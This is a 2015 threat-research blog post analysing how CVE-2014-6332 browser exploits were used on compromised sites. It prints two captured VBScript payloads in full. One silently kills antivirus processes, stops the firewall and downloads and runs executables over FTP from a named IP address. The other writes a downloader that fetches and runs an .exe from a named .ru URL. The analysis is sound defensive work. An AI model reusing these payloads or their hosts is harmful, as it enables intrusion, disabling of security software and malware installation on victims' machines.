Saturday, March 14, 2015

A Real World Story of CVE-2014-6332 : RCE and Malware Download via VBScript !

Recently, we have observed in our analysis that the exploit code for vulnerability with identifier CVE-2014-6332 is either directly embedded in the webpages of the infected website or used as a part of  Browser Exploits Packs (BEPs) for downloading malware and executing commands remotely.

Earlier, we have discussed about how Chinese domains served almost the similar exploits taken from MetaSploit (http://secniche.blogspot.com/2013/03/malware-retrospective-infected-chinese.html) to trigger infections. However, the attackers tweak the structure of exploits as per the requirements in order to conduct successful infections on the fly through compromised websites.

Let's discuss the vulnerability in question. From Internet: "CVE-2014-6332: OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka "Windows OLE Automation Array Remote Code Execution Vulnerability."

Refer: Metasploit Module (http://downloads.securityfocus.com/vulnerabilities/exploits/70952.rb) and Microsoft advisory on the subject (https://technet.microsoft.com/en-us/library/security/ms14-064.aspx)

Trend Micro has some discussed about this vulnerability (http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/) so we do now want to discuss that in detail.

Two variants of VBScript have been found that are used in conjunction with this vulnerability which are discussed below. The primary structure of the exploit remains the same but payload is solely based on the VBScript code embedded in the webpages or BEPs.

As you can see, "cmd.exe" is triggered with options "/q, /c" which forces the Windows to execute command without echoing the output which means commands are executed without any notifications in the Windows GUI. Other insights:

The Norton "360.exe" process is killed and several other commands are executed.

 <script language="VBScript">  
 function runmumaa()   
 On Error Resume Next  
 set shell=createobject("wscript.shell")  
 shell.run "cmd.exe /q /c net user admin /del",0  
 shell.run "cmd.exe /q /c sc stop sharedaccess",0  
 shell.run "cmd.exe /q /c md C:\RECYCLER",0  
 shell.run "cmd.exe /q /c taskkill /f /im 360rp.exe",0  
 shell.run "cmd.exe /q /c taskkill /f /im 360sd.exe",0  
 shell.run "cmd.exe /q /c taskkill /f /im 360tray.exe",0  
 shell.run "cmd.exe /q /c taskkill /f /im arp2.exe",0  
 shell.run "cmd.exe /q /c taskkill /f /im 360.exe",0  
 shell.run "cmd.exe /q /c taskkill /f /im 361.exe",0  
 shell.run "cmd.exe /q /c ping 127.0.0.1 -n 200&taskkill /f /im fp.exe&taskkill /f /im ftp.exe&taskkill /f /im arp1.exe&taskkill /f /im arp2.exe&taskkill /f /im fa1.exe&taskkill /f /im fa2.exe&taskkill /f /im fa.exe",0  
 shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\¡¸¿ªÊ¼¡¹²Ëµ¥\³ÌÐò\Æô¶¯\360.exe",0  
 shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\¡¸¿ªÊ¼¡¹²Ëµ¥\³ÌÐò\Æô¶¯\361.exe",0  
 shell.run "cmd.exe /q /c del C:\RECYCLER\360.exe",0  
 shell.run "cmd.exe /q /c del C:\RECYCLER\361.exe",0  
 shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe C:\RECYCLER\fp.exe",0  
 shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe c:\windows\system32\fp.exe",0  
 shell.run "cmd.exe /q /c copy %systemroot%\system32\ftp.exe %systemroot%\system32\fp.exe",0  
 shell.run "cmd.exe /q /c echo open 104.152.215.90>C:\RECYCLER\fp.dw&echo do1>>C:\RECYCLER\fp.dw&echo 123456>>C:\RECYCLER\fp.dw&echo bin >>C:\RECYCLER\fp.dw&echo get a1.exe C:\RECYCLER\a1.exe>>C:\RECYCLER\fp.dw&echo get arp2.exe C:\RECYCLER\arp2.exe>>C:\RECYCLER\fp.dw&echo get fa2.exe C:\RECYCLER\fa2.exe>>C:\RECYCLER\fp.dw&echo get cgud.exe C:\RECYCLER\cgud.exe>>C:\RECYCLER\fp.dw&echo bye >>C:\RECYCLER\fp.dw&ping 127.0.0.1 -n 10&FP -s:C:\RECYCLER\fp.dw&del C:\RECYCLER\fp.dw /q&copy C:\RECYCLER\fa2.exe C:\docume~1\alluse~1\¡¸¿ªÊ¼¡¹²Ëµ¥\³ÌÐò\Æô¶¯\fa2.exe&copy C:\RECYCLER\arp2.exe C:\docume~1\alluse~1\¡¸¿ªÊ¼¡¹²Ëµ¥\³ÌÐò\Æô¶¯\arp2.exe&start C:\RECYCLER\fa2.exe&start C:\RECYCLER\a1.exe&start C:\RECYCLER\cgud.exe&C:\RECYCLER\arp2.exe&del C:\RECYCLER\fp.exe",0  
 end function  
 </script>  

Another variant of exploit payload is shown below which highlights that how exactly HTTP requests are issued using AJAX and MSXML2 for downloading malware (http://natmasla.ru/ath/sploit/natmasla.exe, this link might be active) directly. VBScript calls are then used to execute the  malware.

 

<script language="VBScript">  
 function runmumaa()   
 On Error Resume Next  
 set shell=createobject("Shell.Application")  
 shell.ShellExecute "cmd.exe", "/c CD %TEMP%&
@echo 
Set objXMLHTTP=CreateObject(""MSXML2.XMLHTTP"")>wUnlRLZR.vbs&
@echo objXMLHTTP.open ""GET"",""http://natmasla.ru/ath/sploit/natmasla.exe"",false>>wUnlRLZR.vbs&
@echo 
objXMLHTTP.send()>>wUnlRLZR.vbs&
@echo If objXMLHTTP.Status=200 Then>>wUnlRLZR.vbs&
@echo Set objADOStream=CreateObject(""ADODB.Stream"")>>wUnlRLZR.vbs&
@echo objADOStream.Open>>wUnlRLZR.vbs&
@echo objADOStream.Type=1 >>wUnlRLZR.vbs&
@echo objADOStream.Write objXMLHTTP.ResponseBody>>wUnlRLZR.vbs&
@echo objADOStream.Position=0 >>wUnlRLZR.vbs&
@echo objADOStream.SaveToFile ""%TEMP%\natmasla.exe"">>wUnlRLZR.vbs&
@echo objADOStream.Close>>wUnlRLZR.vbs&
@echo Set objADOStream=Nothing>>wUnlRLZR.vbs&
@echo End if>>wUnlRLZR.vbs&
@echo Set objXMLHTTP=Nothing>>wUnlRLZR.vbs&
@echo Set objShell=CreateObject(""WScript.Shell"")>>wUnlRLZR.vbs&
@echo objShell.Exec(""%TEMP%\natmasla.exe"")>>wUnlRLZR.vbs&cscript.exe %TEMP%\wUnlRLZR.vbs&del %TEMP%\wUnlRLZR.vbs", "", "open", 0  
 end function  
 </script>  

Public available exploits can be tweaked easily as discussed in the case study above. It is really interesting to analyze the types of payloads and exploits used in the wild for exploiting vulnerabilities in the browsers.

Inference: Openly available exploits are restructured by the attackers and used in BEPs to trigger infections.